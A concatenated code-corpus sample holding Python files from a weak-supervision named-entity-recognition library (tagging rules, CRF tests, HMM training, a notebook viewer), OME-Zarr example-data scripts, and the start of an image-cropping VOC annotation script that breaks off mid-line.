#### File: test/integration_tests/hmm.py ```python from wiser.data.dataset_readers import MediaDatasetReader from wiser.viewer import Viewer dataset_reader = MediaDatasetReader() train_data = dataset_reader.read('data/wikipedia/unlabeled_train.csv') dev_data = dataset_reader.read('data/wikipedia/labeled_dev.csv') test_data = dataset_reader.read('data/wikipedia/labeled_test.csv') # In this tutorial we will use only 750 instances of the training data train_data = train_data[:10] dev_data = dev_data[:10] test_data = test_data[:10] # We must merge all partitions to apply the rules data = train_data + dev_data + test_data from wiser.rules import TaggingRule class MovieYear(TaggingRule): def apply_instance(self, instance): # Creates a list of tokens tokens = [t.text for t in instance['tokens']] # Initializes a list of ABS (abstain) label votes labels = ['ABS'] * len(tokens) for i in range(len(tokens)-2): # Tags proper nouns followed by a number between parentheses if tokens[i].istitle() and tokens[i+1] == '(' and tokens[i+2].isdigit(): labels[i] = 'I-PERF' # Returns the modified label vote list return labels # Applies the tagging rule to all dataset instances tr = MovieYear() tr.apply(data) from wiser.eval.util import tagging_rule_errors Mistakes = tagging_rule_errors(dev_data, 'MovieYear', error_type = 'fp', mode = 'span') from wiser.eval import score_tagging_rules score_tagging_rules(dev_data) from wiser.rules import LinkingRule class ConsecutiveCapitals(LinkingRule): def apply_instance(self, instance): tokens = [t.text for t in instance['tokens']] links = [0] * len(tokens) for i in range(1, len(tokens)): if tokens[i].istitle() and tokens[i-1].istitle(): links[i] = 1 # token at index "i" shares tag with token at index "i-1" return links lr = ConsecutiveCapitals() lr.apply(data) from wiser.eval import score_linking_rules score_linking_rules(dev_data) from wiser.rules import remove_rule class DummyRule(TaggingRule): def apply_instance(self, instance): tokens = [t.text for t in instance['tokens']] return ['ABS'] * len(tokens) tr = DummyRule() tr.apply(data) remove_rule(data, 'DummyRule') # Don't forget to pass the entire dataset score_tagging_rules(dev_data) from wiser.eval import score_labels_majority_vote score_labels_majority_vote(dev_data) from labelmodels import HMM from wiser.generative import Model model = Model(HMM, init_acc=0.95, acc_prior=50, balance_prior=100) from labelmodels import LearningConfig config = LearningConfig() config.epochs = 5 # Outputs the best development score model.train(config, train_data=train_data, dev_data=dev_data) model.evaluate(test_data) model.save_output(data=train_data, path='output/generative/hmm/train_data.p', save_distribution=True) model.save_output(data=dev_data, path='output/generative/hmm/dev_data.p', save_distribution=True, save_tags=True) model.save_output(data=test_data, path='output/generative/hmm/test_data.p', save_distribution=True, save_tags=True) from wiser.data.dataset_readers import weak_label # You need to import weak_label and WiserCrfTagger from wiser.models import WiserCrfTagger # since they are used in the training config. file from allennlp.commands.train import train_model_from_file train_model_from_file(parameter_filename='../../test/integration_tests/IT2.jsonnet', serialization_dir='output/discriminative/hmm', file_friendly_logging=True, force=True) from allennlp.predictors.predictor import Predictor from allennlp.data.tokenizers.word_splitter import SpacyWordSplitter predictor = Predictor.from_path(archive_path='output/discriminative/hmm/model.tar.gz', predictor_name='sentence-tagger') tokenizer = SpacyWordSplitter(language='en_core_web_sm', pos_tags=False) sentence = 'The movie The Lord of the Rings: The Return of the King (2003) \ won all 11 awards for which it was nominated, \ including the Emmy Award for Best Picture' # Prints all tokens in the sentence, alongside their predicted tags for match in zip(tokenizer.split_words(sentence), predictor.predict(sentence)['tags']): print(match) ``` #### File: test/modules/test_conditional_random_field.py ```python import math import numpy as np import torch from torch import optim import unittest from wiser.modules import WiserConditionalRandomField class TestWiserConditionalRandomField(unittest.TestCase): def setUp(self): """ Sets all random seeds before each test. """ seed = 0 torch.backends.cudnn.deterministic = True np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed(seed) def test_distribution_learning_matches(self): """ Trains two CRFs on the same data, once represented as tags and once represented as a distribution, in order to test learning via maximizing expected_log_likelihood. Test passes iff learned parameters of two CRFs match. """ num_labels = 3 num_examples = 100 min_seq_len = 8 max_seq_len = 12 logits = torch.Tensor([-0.5, -.25, 0]) transitions = torch.eye(3) start = torch.Tensor([0.25, 0, 0.25]) start -= torch.max(start) end = start tags, mask = _generate_data( num_examples, min_seq_len, max_seq_len, logits, transitions, start, end) # Trains first CRF on tags crf1 = LinearCrf(num_labels) # Initializes all weights to zero so we can compare with other CRF torch.nn.init.zeros_(crf1.linear) torch.nn.init.zeros_(crf1.transitions) torch.nn.init.zeros_(crf1.start_transitions) torch.nn.init.zeros_(crf1.end_transitions) _train_crf_tags(crf1, tags, mask, 50, 32) # Converts tags to exact distribution distribution = torch.zeros(tags.shape[0], tags.shape[1], num_labels) for i in range(tags.shape[0]): for j in range(tags.shape[1]): distribution[i, j, tags[i, j]] = 1.0 # Trains second CRF on distribution crf2 = LinearCrf(num_labels) torch.nn.init.zeros_(crf2.linear) torch.nn.init.zeros_(crf2.transitions) torch.nn.init.zeros_(crf2.start_transitions) torch.nn.init.zeros_(crf2.end_transitions) _train_crf_distribution(crf2, distribution, mask, 50, 32) # Tests that all parameters match self.assertLess(torch.norm(crf1.linear - crf2.linear), 1e-3) self.assertLess(torch.norm(crf1.transitions - crf2.transitions), 1e-3) self.assertLess(torch.norm(crf1.start_transitions - crf2.start_transitions), 1e-3) self.assertLess(torch.norm(crf1.end_transitions - crf2.end_transitions), 1e-3) class LinearCrf(WiserConditionalRandomField): """Wraps WiserConditionalRandomField to learn fixed logits for each sequence element.""" def __init__(self, num_tags): super().__init__(num_tags, None, True) self.linear = torch.nn.Parameter(torch.Tensor(num_tags)) torch.nn.init.normal_(self.linear) def forward(self, tags: torch.Tensor, mask: torch.ByteTensor = None) -> torch.Tensor: # pylint: disable=arguments-differ return super().forward( self.linear.repeat(tags.shape[0], tags.shape[1], 1), tags, mask ) def expected_log_likelihood( self, distribution: torch.Tensor, mask: torch.ByteTensor = None) -> torch.Tensor: # pylint: disable=arguments-differ return super().expected_log_likelihood( self.linear.repeat(distribution.shape[0], distribution.shape[1], 1), mask, distribution ) def _train_crf_tags(crf, tags, mask, epochs, batch_size): num_batches = math.ceil(tags.shape[0] / batch_size) optimizer = optim.Adam(crf.parameters()) for _ in range(epochs): for i in range(num_batches): batch_tags = tags[i * batch_size:(i+1) * batch_size] batch_mask = mask[i * batch_size:(i+1) * batch_size] crf.zero_grad() loss = -crf(batch_tags, batch_mask) loss.backward() optimizer.step() def _train_crf_distribution(crf, distribution, mask, epochs, batch_size): num_batches = math.ceil(distribution.shape[0] / batch_size) optimizer = optim.Adam(crf.parameters()) for _ in range(epochs): for i in range(num_batches): batch_distribution = distribution[i * batch_size:(i + 1) * batch_size] batch_mask = mask[i * batch_size:(i + 1) * batch_size] crf.zero_grad() loss = -crf.expected_log_likelihood(batch_distribution, batch_mask) loss.backward() optimizer.step() def _generate_data(num_examples, min_seq_len, max_seq_len, logits, transitions, start, end): tags = torch.zeros((num_examples, max_seq_len), dtype=torch.long) mask = torch.zeros((num_examples, max_seq_len), dtype=torch.long) for i in range(num_examples): seq_len = np.random.randint(min_seq_len, max_seq_len + 1) seq = _generate_seq(seq_len, logits, transitions, start, end) for j in range(seq_len): tags[i, j] = seq[j] mask[i, j] = 1 return tags, mask def _generate_seq(seq_len, logits, transitions, start, end, gibbs_rounds=5): seq = torch.zeros((seq_len,), dtype=torch.long) # Randomly initializes the sequence for i in range(seq_len): seq[i] = np.random.randint(logits.shape[0]) # Performs rounds of Gibbs sampling p = torch.zeros((logits.shape[0],)) for _ in range(gibbs_rounds): for i in range(seq_len): if i == 0: # Neighbor only on right p[:] = logits p += transitions[:, seq[i+1]] p += start elif i == seq_len - 1: # Neighbor only on left p[:] = logits p += transitions[seq[i-1], :] p += end else: # Neighbors on both sides p[:] = logits p += transitions[seq[i-1], :] p += transitions[:, seq[i + 1]] p = torch.exp(p - torch.max(p)) p = p / torch.sum(p) seq[i] = float(np.argmax(np.random.multinomial(1, p))) # print(seq) return seq if __name__ == '__main__': unittest.main() ``` #### File: wiser/generative/model.py ```python from wiser.generative import get_label_to_ix, get_rules, train_generative_model, evaluate_generative_model, clean_inputs, get_predictions_generative_model from wiser.data import save_label_distribution from wiser.eval import get_generative_model_inputs class Model: def __init__(self, model_module, init_acc=0.9, acc_prior=50, balance_prior=100, reinitialize=True): """ Initializes a predefined generative model using the given parameters :param model_module labelmodel class of generative model to be initialized :param init_acc: initial estimated tagging and linking rule accuracy, also used as the mean of the prior distribution of the model parameters :param acc_prior: weight of the regularizer pulling tagging and linking rule accuracies toward their initial values. :param balance_prior: used to regularize the class prior in naiveBayes or the initial class distribution for HMM and linkedHMM, as well as the transition matrix in those methods, towards a more uniform distribution. :reinitialize: used to determine if the model should reinitialize weights upon sequential calls of model.train """ self.model_module = model_module self.model_type = model_module.__name__ self.init_acc = init_acc self.acc_prior = acc_prior self.balance_prior = balance_prior self.reinitialize = reinitialize self.gen_label_to_ix = None self.disc_label_to_ix = None self.model = None def train(self, config, train_data, dev_data): """ Trains the generative model :param train_data: array of AllenNLP instances used as training samples :param dev_data: array of labeled AllenNLP instances used as development samples :param config: labelmodel config specifying training configuration """ self.gen_label_to_ix, self.disc_label_to_ix = get_label_to_ix(train_data + dev_data) tagging_rules, linking_rules = get_rules(train_data + dev_data) if (self.model_type == 'NaiveBayes' or self.model_type == 'HMM') and (self.model == None or self.reinitialize): self.model = self.model_module(len(self.gen_label_to_ix) - 1, len(tagging_rules), self.init_acc, self.acc_prior, self.balance_prior) elif self.model_type == 'LinkedHMM' and (self.model == None or self.reinitialize): self.model = self.model_module(len(self.gen_label_to_ix) - 1, len(tagging_rules), len(linking_rules), self.init_acc, self.acc_prior, self.balance_prior) elif not self.model_type in ['NaiveBayes', 'HMM', 'LinkedHMM']: raise ValueError("Unknown model type: %s" % str(type(self.model_type))) p, r, f1 = train_generative_model(self.model, train_data, dev_data, label_to_ix=self.gen_label_to_ix, config=config) # Prints development precision, recall, and F1 scores return p, r, f1 def evaluate(self, data): """ Evaluates the generative model :param data: array of labeled AllenNLP instances used as evaluation samples """ if self.model is None: raise ValueError("You need to train the generative model before evaluating it's output.") return evaluate_generative_model(model=self.model, data=data, label_to_ix=self.gen_label_to_ix) def get_predictions(self, data): """ Gets predictions for the generative model for an input sentence :param data: array of labeled AllenNLP instances used as evaluation samples """ if self.model is None: raise ValueError("You need to train the generative model before evaluating it's output.") return get_predictions_generative_model(model=self.model, data=data, label_to_ix=self.gen_label_to_ix) def save_output(self, data, path, save_distribution=True, save_tags=True): """ Saves the probabilistic output of the generative model :param data: array of labeled AllenNLP instances used as evaluation samples :param path: path to save the data to :param save_distribution: boolean indicating to save the probabilistic distrubution :param save_tags: boolean indicating to save the true tags (if any) """ if self.model is None: raise ValueError("You need to train the generative model before saving the output to disk.") inputs = clean_inputs(get_generative_model_inputs(data, self.gen_label_to_ix), self.model) if save_distribution: if self.model_type == "NaiveBayes": dist = self.model.get_label_distribution(*inputs) save_label_distribution(path, data, unary_marginals=dist, gen_label_to_ix=self.gen_label_to_ix, disc_label_to_ix=self.disc_label_to_ix, save_tags=save_tags) else: p_unary, p_pairwise = self.model.get_label_distribution(*inputs) save_label_distribution(path, data, unary_marginals=p_unary, pairwise_marginals=p_pairwise, gen_label_to_ix=self.gen_label_to_ix, disc_label_to_ix=self.disc_label_to_ix, save_tags=save_tags) else: save_label_distribution(path, data, save_tags) ``` #### File: wiser/wiser/rules.py ```python from tqdm.auto import tqdm def remove_rule(data, name): """ Removes a tagging or linking rule from a given dataset """ for instance in data: if name in instance['WISER_LABELS']: del instance['WISER_LABELS'][name] if name in instance['WISER_LINKS']: del instance['WISER_LINKS'][name] class TaggingRule: def apply(self, instances): for instance in tqdm(instances): # Initializes metadata field if self._get_metadata_field() not in instance: instance.add_field(self._get_metadata_field(), {}) # Labels the instance labels = self.apply_instance(instance) # Stores the labels in the instance instance[self._get_metadata_field()][self._get_tr_name()] = labels def apply_instance(self, instance): raise NotImplementedError def _get_metadata_field(self): return "WISER_LABELS" def _get_tr_name(self): return type(self).__name__ class LinkingRule(TaggingRule): def apply_instance(self, instance): raise NotImplementedError def _get_metadata_field(self): return "WISER_LINKS" class DictionaryMatcher(TaggingRule): def __init__(self, name, terms, uncased=False, match_lemmas=False, i_label="I", abs_label="ABS"): self.name = name self.uncased = uncased self.match_lemmas = match_lemmas self.i_label = i_label self.abs_label = abs_label self._load_terms(terms) def apply_instance(self, instance): tokens = self._normalize_instance_tokens(instance['tokens']) labels = [self.abs_label] * len(instance['tokens']) # Checks whether any terms in the dictionary appear in the instance i = 0 while i < len(tokens): if tokens[i] in self.term_dict: candidates = self.term_dict[tokens[i]] for c in candidates: # Checks whether normalized AllenNLP tokens equal the list # of string tokens defining the term in the dictionary if i + len(c) <= len(tokens): equal = True for j in range(len(c)): if tokens[i + j] != c[j]: equal = False break # If tokens match, labels the instance tokens if equal: for j in range(i, i + len(c)): labels[j] = self.i_label i = i + len(c) - 1 break i += 1 # Additionally checks lemmas if requested. This will not overwrite # existing votes if self.match_lemmas: tokens = self._normalize_instance_tokens(instance['tokens'], lemmas=True) i = 0 while i < len(tokens): if tokens[i] in self.term_dict: candidates = self.term_dict[tokens[i]] for c in candidates: # Checks whether normalized AllenNLP tokens equal the list # of string tokens defining the term in the dictionary if i + len(c) <= len(tokens): equal = True for j in range(len(c)): if tokens[i + j] != c[j] or labels[i + j] != self.abs_label: equal = False break # If tokens match, labels the instance tokens using map if equal: for j in range(i, i + len(c)): labels[j] = self.i_label i = i + len(c) - 1 break i += 1 return labels def _get_tr_name(self): return self.name def _normalize_instance_tokens(self, tokens, lemmas=False): if lemmas: normalized_tokens = [token.lemma_ for token in tokens] else: normalized_tokens = [token.text for token in tokens] if self.uncased: normalized_tokens = [token.lower() for token in normalized_tokens] return normalized_tokens def _normalize_terms(self, tokens): if self.uncased: return [token.lower() for token in tokens] return tokens def _load_terms(self, terms): self.term_dict = {} for term in terms: normalized_term = self._normalize_terms(term) if normalized_term[0] not in self.term_dict: self.term_dict[normalized_term[0]] = [] self.term_dict[normalized_term[0]].append(normalized_term) # Sorts the terms in decreasing order so that we match the longest first for first_token in self.term_dict.keys(): to_sort = self.term_dict[first_token] self.term_dict[first_token] = sorted( to_sort, reverse=True, key=lambda x: len(x)) ``` #### File: wiser/wiser/umls.py ```python import itertools import os from .rules import DictionaryMatcher class UMLSMatcher(DictionaryMatcher): def __init__( self, name, path, sem_types, additional_stop_words=None, max_tokens=4, i_label="I", abs_label="ABS"): # Collects concept IDs of the requested semtantic type(s) CUIs = set() sem_type_file = os.path.join(path, 'META', 'MRSTY.RRF') with open(sem_type_file, 'r') as f: for line in f.readlines(): data = line.strip().split('|') if data[3] in sem_types: CUIs.add(data[0]) # Collects all English terms corresponding to the collected concepts terms = set() name_file = os.path.join(path, 'META', 'MRXNS_ENG.RRF') with open(name_file, 'r') as f: for line in f.readlines(): data = line.strip().split('|') if data[2] in CUIs and len(data[1].split(' ')) <= max_tokens: terms.add(data[1]) # Removes stop words that are too common from terms self._filter_stop_words(terms, additional_stop_words) # Tokenizes the UMLS terms terms = [term.split(' ') for term in terms] # Creates reordered copies of terms for common groups, # e.g., "cancer ovarian" -> "ovarian cancer" self._expand_terms(terms) # Finished intializing the tagging rule super(UMLSMatcher, self).__init__( name, terms, match_lemmas=True, i_label=i_label, abs_label=abs_label) def _normalize_instance_tokens(self, tokens, lemmas=False): if lemmas: normalized_tokens = [token.lemma_ for token in tokens] else: normalized_tokens = [token.text.lower() for token in tokens] return normalized_tokens def _expand_terms(self, terms): new_terms = set() for term in terms: for new_term in itertools.permutations(term): new_terms.add(" ".join(new_term)) terms.extend(term.split(' ') for term in new_terms) def _filter_stop_words(self, terms, additional_stop_words): """ We remove terms that appear in UMLS that are unlikely to be terms of interest (by themselves) for NER. Users who want to change this behavior can override this method. :param terms: :param additional_stop_words: """ stop_words = { "a", "abated", "active", "age", "aged", "agent", "advantage", "aid", "aided", "aim", "air", "al", "alert", "all", "an", "animal", "as", "ascending", "at", "atm", "avid", "b", "balance", "base", "basic", "basis", "be", "blockade", "bp", "but", "c", "came", "can", "cards", "color", "combination", "conclude", "concluded", "condition", "contrast", "control", "counter", "critically", "culture", "d", "damage", "date", "de", "defect", "deletion", "delivered", "direct", "disease", "disorder", "doctor", "dose", "doses", "drug", "duplication", "duration", "e", "electron", "element", "elements", "end", "et", "evaluable", "exposure", "f", "factor", "family", "favor", "favored", "feeding", "finding", "food", "g", "glomerular", "grade", "green", "group", "h", "he", "her", "hers", "hg", "hh", "his", "i", "ii", "if", "in", "inactive", "ingredient", "injection", "inner", "ion", "is", "isotope", "j", "k", "l", "label", "leading", "level", "light", "m", "man", "march", "mass", "matrix", "mediate", "medication", "men", "messenger", "met", "mimic", "ml", "mg", "mm", "mutant", "mutation", "n", "neuroleptic", "no", "nonsense", "o", "opioid", "or", "oral", "other", "p", "perform", "personality", "placebo", "plan", "planned", "plasma", "pool", "prevent", "probe", "program", "prompt", "prove", "pseudo", "purpose", "psychotropic", "q", "r", "react", "receptor", "recruitment", "relate", "relates", "related", "relief", "rise", "rose", "rr", "run", "runs", "s", "same", "se", "sham", "smell", "so", "solution", "solid", "spared", "stain", "suffer", "support", "sustain", "syndrome", "t", "ten", "therapeutic", "tilt", "to", "tonic", "transition", "triad", "tricyclic", "tubular", "u", "unknown", "us", "v", "various", "vessel", "w", "was", "water", "were", "worse", "x", "y", "z" } if additional_stop_words is not None: for stop_word in additional_stop_words: stop_words.add(stop_word) for stop_word in stop_words: if stop_word in terms: terms.remove(stop_word) ``` #### File: wiser/viewer/viewer.py ```python try: from IPython.core.display import display, Javascript except ModuleNotFoundError: raise Exception("This module requires IPython.") import os import ipywidgets as widgets from traitlets import Unicode directory = os.path.abspath(os.path.dirname(__file__)) PAGE_HTML = u""" <div class="viewer-page" id="viewer-page-{id}-{source}"{etc}> {data} </div> """ SOURCE_OPTION_HTML = u""" <option value="{value}">{name}</option> """ class Viewer(widgets.DOMWidget): """Viewer for instances and associated labels.""" _view_name = Unicode('ViewerView').tag(sync=True) _view_module = Unicode('viewer').tag(sync=True) _view_module_version = Unicode('0.1.0').tag(sync=True) html = Unicode('<h3>Error rendering Viewer!</h3>').tag(sync=True) _labels_serialized = Unicode().tag(sync=True) def __init__(self, instances, height=300, additional_labels=None): super(Viewer, self).__init__() self.instances = instances self.n_instances = len(instances) self.height = height if additional_labels is not None: self.additional_labels = additional_labels else: self.additional_labels = {} # display js, construct html and pass on to widget model self.render() def render(self): """Renders viewer pane""" # Collects all labeling function names. We assume that all instances # in the collection are labeled by the same functions. if 'WISER_LABELS' in self.instances[0]: lf_names = sorted(self.instances[0]['WISER_LABELS'].keys()) else: lf_names = [] # Also sorts names of any additional label sources additional_names = sorted(self.additional_labels.keys()) # Renders all pages pages = [] first = True for i, instance in enumerate(self.instances): # Collects labels for instance labels = [instance['tags']] for name in additional_names: labels.append(self.additional_labels[name][i]) for lf_name in lf_names: labels.append(instance['WISER_LABELS'][lf_name]) for j, label_seq in enumerate(labels): rendered_instance = self._render_instance(instance, label_seq) pages.append(PAGE_HTML.format( data=rendered_instance, id=i, source=j, etc=' style="display: block;"' if first else '' )) first = False # Renders the label source options source_options = [SOURCE_OPTION_HTML.format(value=0, name="Gold Labels")] offset = 1 for i, name in enumerate(additional_names): source_options.append( SOURCE_OPTION_HTML.format(value=i+offset, name=name)) offset += len(additional_names) for i, lf_name in enumerate(lf_names): source_options.append( SOURCE_OPTION_HTML.format(value=i+offset, name=lf_name)) # Render in Viewer template self.html = open(os.path.join(directory, 'viewer.html')).read()\ % (self.height, ''.join(pages), ''.join(source_options)) display(Javascript(open(os.path.join(directory, 'viewer.js')).read())) def _render_instance(self, instance, labels): if len(instance['tokens']) != len(labels): raise ValueError("Number of tokens does not match number of labels") html = [] active_span = False for i in range(len(instance['tokens'])): if (labels[i][0] == 'I' and not active_span) or labels[i][0] == 'B': if labels[i][0] == 'B': html.append("</span>") html.append(" ") title = "Entity" if len(labels[i]) <= 2 else labels[i][2:] html.append("<span class='active' title='%s'>" % title) active_span = True elif labels[i][0] == 'O' or labels[i] == 'ABS': if active_span: html.append("</span>") html.append(" ") active_span = False else: html.append(" ") html.append(instance['tokens'][i].text) # Closes span if still active if active_span: html.append("</span>") return ''.join(html) ```
{ "source": "aabbas90/elf", "score": 2 }
#### File: example/io/ngff_examples.py ```python import argparse import os import imageio import numpy as np from elf.io import open_file from elf.io.ngff import write_ome_zarr def _kwargs_2d(): return {"scale": (0.5, 0.5), "order": 0, "preserve_range": True} def _kwargs_3d(): return {"scale": (0.5, 0.5, 0.5), "order": 0, "preserve_range": True} def _load_data(path, key, bb): if key is None: data = imageio.volread(path) data = data[bb] else: with open_file(path, 'r') as f: data = f[key][bb] return data def _create_example(in_path, folder, axes, key=None, bb=np.s_[:], dimension_separator="/"): ax_name = ''.join(axes) if dimension_separator == "/": out_path = os.path.join(folder, f"{ax_name}.ome.zarr") else: out_path = os.path.join(folder, f"flat_{ax_name}.ome.zarr") if os.path.exists(out_path): print("Example data at", out_path, "is already present") return data = _load_data(in_path, key, bb) assert data.ndim == len(axes) kwargs = _kwargs_3d() if axes[-3:] == ('z', 'y', 'x') else _kwargs_2d() write_ome_zarr(data, out_path, axes, ax_name, n_scales=3, kwargs=kwargs, dimension_separator=dimension_separator) # # create ngff ome.zarr example data # # all the filepath are hard-coded to the EMBL kreshuk group share # axes: yx def create_2d_example(folder): # yx: covid htm data with only nucleus channel in_path = os.path.join("/g/kreshuk/data/covid/covid-data-vibor/20200405_test_images", "WellC01_PointC01_0000_ChannelDAPI,WF_GFP,TRITC,WF_Cy5_Seq0216.tiff") _create_example(in_path, folder, axes=("y", "x"), bb=np.s_[0, :, :]) def _make_t_volume(path, timepoints, out_path, scale=2): if os.path.exists(out_path): return data = [] for tp in timepoints: key = f'setup0/timepoint{tp}/s{scale}' with open_file(path, 'r') as f: d = f[key][:] data.append(d[None]) data = np.concatenate(data, axis=0) with open_file(out_path, 'w') as f: f.create_dataset('data', data=data, chunks=(1, 64, 64, 64)) # TODO add linked labels for the zyx example # axes: zyx, cyx, tyx def create_3d_examples(folder): # zyx: covid em data + labels raw_path = os.path.join('/g/kreshuk/pape/Work/mobie/covid-em-datasets/data', 'Covid19-S4-Area2/images/local/sbem-6dpf-1-whole-raw.n5') raw_key = 'setup0/timepoint0/s3' _create_example(raw_path, folder, axes=("z", "y", "x"), key=raw_key) # for linked labels # seg_path = os.path.join('/g/kreshuk/pape/Work/mobie/covid-em-datasets/data', # 'Covid19-S4-Area2/images/local/s4_area2_segmentation.n5') # seg_key = 'setup0/timepoint0/s3' # cyx: covid htm data with more channels in_path = os.path.join("/g/kreshuk/data/covid/covid-data-vibor/20200405_test_images", "WellC01_PointC01_0000_ChannelDAPI,WF_GFP,TRITC,WF_Cy5_Seq0216.tiff") _create_example(in_path, folder, axes=("c", "y", "x"), bb=np.s_[:3, :, :]) # tyx: middle slice from arabidopsis dataset timepoints = [32, 33, 34] scale = 2 raw_path = os.path.join('/g/kreshuk/pape/Work/mobie/arabidopsis-root-lm-datasets/data', 'arabidopsis-root/images/local/lm-membranes.n5') tmp_path = './tp_data.h5' _make_t_volume(raw_path, timepoints, tmp_path, scale=scale) _create_example(tmp_path, folder, axes=("t", "y", "x"), bb=np.s_[:, 200, :, :], key='data') def _make_tc_volume(path1, path2, timepoints, out_path, scale=2): if os.path.exists(out_path): return data = [] for tp in timepoints: key = f'setup0/timepoint{tp}/s{scale}' with open_file(path1, 'r') as f: d1 = f[key][:] with open_file(path2, 'r') as f: d2 = f[key][:] d = np.concatenate([d1[None], d2[None]], axis=0) data.append(d[None]) data = np.concatenate(data, axis=0) with open_file(out_path, 'w') as f: f.create_dataset('data', data=data, chunks=(1, 1, 64, 64, 64)) # axes: tzyx, tcyx, czyx def create_4d_examples(folder): # tzyx: arabidopsis dataset (boundaries) tmp_path = './tp_data.h5' _create_example(tmp_path, folder, key="data", axes=("t", "z", "y", "x"), bb=np.s_[:]) # tcyx: arabidopsis boundaries and nuclei, middle slice timepoints = [32, 33, 34] scale = 2 path1 = '/g/kreshuk/pape/Work/mobie/arabidopsis-root-lm-datasets/data/arabidopsis-root/images/local/lm-membranes.n5' path2 = '/g/kreshuk/pape/Work/mobie/arabidopsis-root-lm-datasets/data/arabidopsis-root/images/local/lm-nuclei.n5' tmp_path = './tp_channel_data.h5' _make_tc_volume(path1, path2, timepoints, tmp_path, scale=scale) _create_example(tmp_path, folder, key="data", axes=("t", "c", "y", "x"), bb=np.s_[:, :, 200, :, :]) # czyx: arabidopsis dataset (boundaries + nuclei), single timepoint _create_example(tmp_path, folder, key="data", axes=("c", "z", "y", "x"), bb=np.s_[0, :, :, :, :]) # axes: tczyx def create_5d_example(folder): # tczyx: full arabidopsis dataset tmp_path = './tp_channel_data.h5' _create_example(tmp_path, folder, key="data", axes=("t", "c", "z", "y", "x"), bb=np.s_[:, :, :, :, :]) # using '.' dimension separator def create_flat_example(folder): # yx: covid htm data with only nucleus channel in_path = os.path.join("/g/kreshuk/data/covid/covid-data-vibor/20200405_test_images", "WellC01_PointC01_0000_ChannelDAPI,WF_GFP,TRITC,WF_Cy5_Seq0216.tiff") _create_example(in_path, folder, axes=("y", "x"), bb=np.s_[0, :, :], dimension_separator=".") def copy_readme(output_folder, version): readme = f""" # Example data for OME-ZARR NGFF v{version} This folder contains the following example ome.zarr files - yx: 2d image, data is the nucleus channel of an image from [1] - zyx: 3d volume, data is an EM volume from [2] - cyx: 2d image with channels, image with 3 channels from [1] - tyx: timeseries of 2d images, timeseries of central slice of membrane channel from [3] - tzyx: timeseries of 3d images, timeseries of membrane channel volume from [3] - tcyx: timeseries of images with channel, timeseries of central slice of membrane + nucleus channel from [3] - czyx: 3d volume with channel, single timepoint of membrane and nucleus channel from [3] - tczyx: timeseries of 3d volumes with channel, full data from [3] - flat_yx: same as yx, but using flat chunk storage (dimension_separator=".") instead of nested storage Publications: [1] https://onlinelibrary.wiley.com/doi/full/10.1002/bies.202000257 [2] https://www.sciencedirect.com/science/article/pii/S193131282030620X [3] https://elifesciences.org/articles/57613 """ out_path = os.path.join(output_folder, 'Readme.md') with open(out_path, 'w') as f: f.write(readme) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-o', '--output_root', required=True) parser.add_argument('--version', default="v0.3") args = parser.parse_args() output_folder = os.path.join(args.output_root, args.version) os.makedirs(output_folder, exist_ok=True) create_2d_example(output_folder) create_3d_examples(output_folder) create_4d_examples(output_folder) create_5d_example(output_folder) create_flat_example(output_folder) copy_readme(output_folder, args.version) ```
{ "source": "aabbcc23/pytorch_FPN_Rnn_windows", "score": 3 }
#### File: aabbcc23/pytorch_FPN_Rnn_windows/imagegeneral.py ```python import cv2 import math import numpy as np import os import random import xml.etree.cElementTree as ET import sys #用于抠图。 counts=0 class GEN_Annotations: def __init__(self,filename): self.root=ET.Element("annotation") child1=ET.SubElement(self.root,"folder") child1.text="VOC2012" child2=ET.SubElement(self.root,"filename") child2.text=filename child22=ET.SubElement(self.root,"path") child22.text=filename child3=ET.SubElement(self.root,"source") child6=ET.SubElement(self.root,"segmented") child6.text="0" child4=ET.SubElement(child3,"annotation") child4.text="PASCAL VOC2012" child5=ET.SubElement(child3,"database") def set_size(self,width,height,channel): size=ET.SubElement(self.root,"size") widthn=ET.SubElement(size,"width") widthn.text=str(width) heightn=ET.SubElement(size,"height") heightn.text=str(height) channeln=ET.SubElement(size,"channel") channeln.text=str(channel) def savefile(self,filename): tree=ET.ElementTree(self.root) tree.write(filename,encoding='utf-8') def add_pic_attr(self,label,x,y,w,h): object=ET.SubElement(self.root,"object") namen=ET.SubElement(object,"name") namen.text=label pos=ET.SubElement(object,"pos") pos.text="Unspecified" truncated=ET.SubElement(object,"truncated") truncated.text="0" difficult=ET.SubElement(object,"difficult") difficult.text="0" bndbox=ET.SubElement(object,"bndbox") xminn=ET.SubElement(bndbox,"xmin") xminn.text=str(int(x)) yminn=ET.SubElement(bndbox,"ymin") yminn.text=str(int(y)) xmaxn=ET.SubElement(bndbox,"xmax") xmaxn.text=str(int(w)) ymaxn=ET.SubElement(bndbox,"ymax") ymaxn.text=str(int(h)) def readxml(path,tags): if os.path.isfile(path) and ".xml" in path: tree=ET.parse(path) root=tree.getroot() filename=root.find('filename').text filename=filename[:-4] for size in root.findall('size'): width=int(size.find('width').text) height=int(size.find('height').text) fp=np.array([]) count=0 for object in root.findall('object'): name=object.find('name').text if name==tags: fp=np.append(fp,count) count=count+1 count=0 choose=random.randint(0,len(fp)-1) for object in root.findall('object'): name=object.find('name').text if count==fp[choose]: bndbox=object.find('bndbox') xmin=int(bndbox.find('xmin').text) ymin=int(bndbox.find('ymin').text) xmax=int(bndbox.find('xmax').text) ymax=int(bndbox.find('ymax').text) p1=[xmin,ymin,1] p2=[xmax,ymax,1] p3=[xmin,ymax,1] p4=[xmax,ymin,1] return p1,p2,p3,p4,tree,width,height count=count+1 def loopxml(path,tags): list=os.listdir(path) files=[[None,[None]]] for i in range(0,len(list)): lpath=path+"/"+list[i] if os.path.isfile(lpath) and ".xml" in lpath: tree=ET.parse(lpath) root=tree.getroot() filename=root.find('filename').text filename=filename[:-4] for size in root.findall('size'): width=size.find('width').text height=size.find('height').text for object in root.findall('object'): name=object.find('name').text for i in range(len(tags)): if tags[i][0]==name: have=name in [x[0] for x in files] count=0; for x in files: if x[0]==name: break count=count+1 if have==True: files[count][1]=np.append(files[count][1],lpath) else: tem_file=[[name,[None]]] tem_file[0][1]=lpath files=np.concatenate((files,tem_file),axis=0) return files def random_op(op,path,filename,tags,saveimageorgtPath): print(path) #image=cv2.imread(path) image=cv2.imdecode(np.fromfile(path),1) #cv2.imshow("test",image) #cv2.waitKey(0) #print(image) rows,cols=image.shape[:2] #print("1",rows,cols) # deltax=random.randint(-int(rows/2),int(rows/2)) # deltay=random.randint(-int(cols/2),int(cols/2)) deltax =0# random.randint(-int(rows / 2), int(rows / 